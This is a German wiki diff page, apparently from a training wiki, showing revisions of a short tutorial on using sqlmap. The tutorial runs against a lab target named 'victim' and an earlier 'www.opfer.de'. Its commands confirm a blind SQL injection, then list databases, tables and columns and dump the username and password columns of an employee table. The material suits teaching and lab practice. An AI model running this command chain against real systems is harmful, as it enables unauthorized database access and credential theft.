Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(40 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
=Aufruf des Wizards - for beginners=
+
=Ausgabe aller Parameter und Optionen=
*sqlmap --wizard
+
*sqlmap -hh
  
=URL angreifen / auf Schwachstellen testen=
+
=Datenbanken anzeigen (optional)=
*sqlmap www.opfer.de/index.php?id=1
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
 +
 
 +
=Verwundbarkeit bestätigen=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --batch --string=VALID --flush-session
 +
 
 +
=Tabellen der Datenbank tuxmen=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen --tables --batch --string=VALID
 +
 
 +
=Spalten der Tabelle mitarbeiter=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter --columns --batch --string=VALID
 +
 
 +
=Daten dumpen=
 +
 
 +
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID

Aktuelle Version vom 25. Juni 2026, 05:42 Uhr

Ausgabe aller Parameter und Optionen

  • sqlmap -hh

Datenbanken anzeigen (optional)

Verwundbarkeit bestätigen

Tabellen der Datenbank tuxmen

Spalten der Tabelle mitarbeiter

Daten dumpen